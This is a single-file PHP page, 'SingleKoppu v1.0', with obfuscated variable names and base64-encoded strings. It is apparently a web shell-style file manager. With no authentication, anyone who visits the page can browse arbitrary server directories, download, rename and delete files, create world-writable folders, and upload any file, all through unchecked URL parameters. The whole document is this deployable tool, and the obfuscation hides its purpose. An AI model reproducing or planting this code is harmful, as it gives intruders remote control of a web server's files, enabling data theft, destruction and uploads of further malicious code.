<?php class SingleKoppu{public $d_736007832d21;public $i_572d4e421e5e;function __construct($s_9503f769fcae=null){if($s_9503f769fcae==null){$e_caf9b6b99962=pathinfo(__FILE__);$this->$g_d74eea4899a6=$e_caf9b6b99962[base64_decode('ZGlybmFtZQ==')];}else{$this->$g_d74eea4899a6=$s_9503f769fcae;}}function fileList(){$v_45b963397aa4=array_slice(scandir($this->$g_d74eea4899a6),2);$a_10ae9fc7d453=array();for($y_865c0c0b4ab0=0;$y_865c0c0b4ab0<sizeof($v_45b963397aa4);$y_865c0c0b4ab0++){$v_599dcce2998a=filetype($this->$g_d74eea4899a6.base64_decode('Lw==').$v_45b963397aa4[$y_865c0c0b4ab0]);$y_fd456406745d="?download={$v_45b963397aa4[$y_865c0c0b4ab0]}&type={$v_599dcce2998a}&curDir={$this->$g_d74eea4899a6}";$a_10ae9fc7d453[]=array(base64_decode('ZmlsZQ==')=>$v_45b963397aa4[$y_865c0c0b4ab0],base64_decode('dHlwZQ==')=>$v_599dcce2998a,base64_decode('ZG93bmxvYWQ=')=>$y_fd456406745d,base64_decode('ZGVsZXRl')=>"?delete={$v_45b963397aa4[$y_865c0c0b4ab0]}&type={$v_599dcce2998a}&curDir={$this->$g_d74eea4899a6}",base64_decode('dmlldw==')=>($v_599dcce2998a==base64_decode('ZGly'))?"?goDir={$this->$g_d74eea4899a6}/{$v_45b963397aa4[$y_865c0c0b4ab0]}&curDir={$this->$g_d74eea4899a6}":$y_fd456406745d,);}return $a_10ae9fc7d453;}function rename($b_8d777f385d3d){$e_caf9b6b99962=rename($b_8d777f385d3d[base64_decode('Y3VyRGly')].base64_decode('Lw==').$b_8d777f385d3d[base64_decode('cmVuYW1l')],$b_8d777f385d3d[base64_decode('Y3VyRGly')].base64_decode('Lw==').$b_8d777f385d3d[base64_decode('bmV3TmFtZQ==')]);$this->$g_d74eea4899a6=$b_8d777f385d3d[base64_decode('Y3VyRGly')];}function download($b_8d777f385d3d){if($b_8d777f385d3d[base64_decode('dHlwZQ==')]==base64_decode('ZmlsZQ==')){$w_8c7dd922ad47=$b_8d777f385d3d[base64_decode('Y3VyRGly')].base64_decode('Lw==').$b_8d777f385d3d[base64_decode('ZG93bmxvYWQ=')];header(base64_decode('Q29udGVudC1EZXNjcmlwdGlvbjogRmlsZSBUcmFuc2Zlcg=='));header(base64_decode('Q29udGVudC1UeXBlOmFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ=='));header(base64_decode('QWNjZXB0LVJhbmdlczogYnl0ZXM='));header(base64_decode('Q29udGVudC1MZW5ndGg6IA==').filesize($w_8c7dd922ad47));header(base64_decode('RXhwaXJlczogMA=='));header(base64_decode('Q2FjaGUtQ29udHJvbDogbXVzdC1yZXZhbGlkYXRl'));header(base64_decode('UHJhZ21hOiBwdWJsaWM='));header(base64_decode('Q29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9').$b_8d777f385d3d[base64_decode('ZG93bmxvYWQ=')]);flush();readfile($w_8c7dd922ad47);exit;}else if($b_8d777f385d3d[base64_decode('dHlwZQ==')]==base64_decode('ZGly')){echo base64_decode('emlwIGRvd25sb2FkIG5vdCBkb25lLi4uLi4uLjxicj4=');}}function delete($b_8d777f385d3d){if($b_8d777f385d3d[base64_decode('dHlwZQ==')]==base64_decode('ZGly')){$e_caf9b6b99962=rmdir($b_8d777f385d3d[base64_decode('Y3VyRGly')].base64_decode('Lw==').$b_8d777f385d3d[base64_decode('ZGVsZXRl')]);}else if($b_8d777f385d3d[base64_decode('dHlwZQ==')]==base64_decode('ZmlsZQ==')){$e_caf9b6b99962=unlink($b_8d777f385d3d[base64_decode('Y3VyRGly')].base64_decode('Lw==').$b_8d777f385d3d[base64_decode('ZGVsZXRl')]);}$this->$g_d74eea4899a6=$b_8d777f385d3d[base64_decode('Y3VyRGly')];}function goDir($d_736007832d21){$this->$g_d74eea4899a6=$d_736007832d21;}function backDir($d_736007832d21){$m_d4c8b3771b4d=explode(base64_decode('Lw=='),$d_736007832d21);array_pop($m_d4c8b3771b4d);$v_b7226ee65e1c=implode(base64_decode('Lw=='),$m_d4c8b3771b4d);$this->$g_d74eea4899a6=$v_b7226ee65e1c;}function createFolder($b_8d777f385d3d){$e_caf9b6b99962=mkdir($b_8d777f385d3d[base64_decode('Y3VyRGly')].base64_decode('Lw==').$b_8d777f385d3d[base64_decode('Y3JlYXRlRm9sZGVy')],0777);$this->$g_d74eea4899a6=$b_8d777f385d3d[base64_decode('Y3VyRGly')];}function filesUpload($v_45b963397aa4,$d_736007832d21){for($y_865c0c0b4ab0=0;$y_865c0c0b4ab0<sizeof($v_45b963397aa4[base64_decode('ZmlsZXNVcGxvYWQ=')][base64_decode('ZXJyb3I=')]);$y_865c0c0b4ab0++){if($v_45b963397aa4[base64_decode('ZmlsZXNVcGxvYWQ=')][base64_decode('ZXJyb3I=')][$y_865c0c0b4ab0]==0){move_uploaded_file($v_45b963397aa4[base64_decode('ZmlsZXNVcGxvYWQ=')][base64_decode('dG1wX25hbWU=')][$y_865c0c0b4ab0],$d_736007832d21.base64_decode('Lw==').$v_45b963397aa4[base64_decode('ZmlsZXNVcGxvYWQ=')][base64_decode('bmFtZQ==')][$y_865c0c0b4ab0]);}}$this->$g_d74eea4899a6=$d_736007832d21;}function auto($t_b5eda0a74558,$v_45b963397aa4,$z_42b90196b487){if(isset($t_b5eda0a74558[base64_decode('Z29EaXI=')])){$this->goDir($t_b5eda0a74558[base64_decode('Z29EaXI=')]);}if(isset($t_b5eda0a74558[base64_decode('YmFja0Rpcg==')])){$this->backDir($t_b5eda0a74558[base64_decode('YmFja0Rpcg==')]);}if(isset($t_b5eda0a74558[base64_decode('cmVuYW1l')])){$this->rename($t_b5eda0a74558);}if(isset($t_b5eda0a74558[base64_decode('ZG93bmxvYWQ=')])){$this->download($t_b5eda0a74558);}if(isset($t_b5eda0a74558[base64_decode('ZGVsZXRl')])){$this->delete($t_b5eda0a74558);}if(isset($t_b5eda0a74558[base64_decode('Y3JlYXRlRm9sZGVy')])){$this->createFolder($t_b5eda0a74558);}if(isset($v_45b963397aa4[base64_decode('ZmlsZXNVcGxvYWQ=')])){$this->filesUpload($v_45b963397aa4,$t_b5eda0a74558[base64_decode('Y3VyRGly')]);}return error_get_last();}}$r_690ddc111936=new SingleKoppu();$u_cb5e100e5a9a=$r_690ddc111936->auto($_GET,$_FILES,$_POST);$a_10ae9fc7d453=$r_690ddc111936->fileList();?>
<!DOCTYPE html>
<html>
<head>
<title>SingleKoppu v1.0</title>
</head>
<body>

<table>
  <tr>
    <th>Name</th>
    <th>Type</th>
    <th>Dwonload</th>
    <th>Rename</th>
    <th>Dalete</th>
  </tr>
  <tr><td colspan="5"><hr></td></tr>
  <tr>
    <td><a href="?backDir=<?php echo $r_690ddc111936->$g_d74eea4899a6;?>">../back</a></td>
    <td align="center">[dir]</td>
    <td align="center">null</a></td>
    <td align="center">null</td>
    <td align="center">null</a></td>
  </tr>
  <tr><td colspan="5"><hr></td></tr>
  <?php for($y_865c0c0b4ab0=0;$y_865c0c0b4ab0<sizeof($a_10ae9fc7d453);$y_865c0c0b4ab0++){?>
  <tr>
    <td><a href="<?php echo $a_10ae9fc7d453[$y_865c0c0b4ab0][base64_decode('dmlldw==')];?>"><?php echo $a_10ae9fc7d453[$y_865c0c0b4ab0][base64_decode('ZmlsZQ==')];?></a></td>
    <td align="center">[<?php echo $a_10ae9fc7d453[$y_865c0c0b4ab0][base64_decode('dHlwZQ==')];?>]</td>
    <td align="center"><a href="<?php echo $a_10ae9fc7d453[$y_865c0c0b4ab0][base64_decode('ZG93bmxvYWQ=')];?>" ><b>&veeeq;</b></a></td>
    <td>
      <input type="text" value="<?php echo $a_10ae9fc7d453[$y_865c0c0b4ab0][base64_decode('ZmlsZQ==')];?>" koppu-rename-input><input koppu-data="<?php echo $a_10ae9fc7d453[$y_865c0c0b4ab0][base64_decode('ZmlsZQ==')];?>" koppu-data-type="<?php echo $a_10ae9fc7d453[$y_865c0c0b4ab0][base64_decode('dHlwZQ==')];?>" koppu-data-new="<?php echo $a_10ae9fc7d453[$y_865c0c0b4ab0][base64_decode('ZmlsZQ==')];?>" type="button" value="Rename" koppu-rename-action>
    </td>
    <td align="center"><a href="<?php echo $a_10ae9fc7d453[$y_865c0c0b4ab0][base64_decode('ZGVsZXRl')];?>">&xotime;</a></td>
  </tr>
  <tr><td colspan="5"><hr></td></tr>
  <?php }?>
  <tr>
    <td colspan="2"><input type="text" placeholder="Create folder"  koppu-folder-input><input koppu-folder-action type="button" value="Create"></td>
    <form method="POST" action="?curDir=<?php echo $r_690ddc111936->$g_d74eea4899a6;?>" multipart="" enctype="multipart/form-data">
    <td colspan="3"><input type="file" name="filesUpload[]" multiple><input type="submit" value="Upload"></td> 
    </form>
  </tr>
</table>
<p><a href="?goDir=<?php echo $r_690ddc111936->$g_d74eea4899a6;?>"><?php echo $r_690ddc111936->$g_d74eea4899a6;?></a></p>
<input type="hidden" koppu="dir" value="<?php echo $r_690ddc111936->$g_d74eea4899a6;?>">
<pre>
<?php print_r($u_cb5e100e5a9a);?>
</pre>
<script>
  var singleKoppu = {
    renameInput: function(elem) {
      elem.nextElementSibling.setAttribute('koppu-data-new', elem.value);
    },
    renameAction: function(elem) {
      var dir = document.querySelector('input[koppu=dir]');
      window.location.href=`?rename=${elem.getAttribute('koppu-data')}&newName=${elem.getAttribute('koppu-data-new')}&type=${elem.getAttribute('koppu-data-type')}&curDir=${dir.value}`;
    },
    folderAction: function(elem) {
      var dir = document.querySelector('input[koppu=dir]');
      var input = document.querySelector('input[koppu-folder-input]');
      window.location.href = `?createFolder=${input.value}&curDir=${dir.value}`;
    }
  };

 var kRi = document.querySelectorAll('input[koppu-rename-input]');
 for (let i = 0; i < kRi.length; i++) {
  kRi[i].addEventListener('input', function() {
    singleKoppu.renameInput(kRi[i]);
  });
 }

 var kRa = document.querySelectorAll('input[koppu-rename-action]');
 for (let i = 0; i < kRa.length; i++) {
  kRa[i].addEventListener('click', function() {
    singleKoppu.renameAction(kRa[i]);
  });
 } 

 document.querySelector('input[koppu-folder-action]').addEventListener('click', function() {
  singleKoppu.folderAction(this);
 });
</script>
</body>
</html>
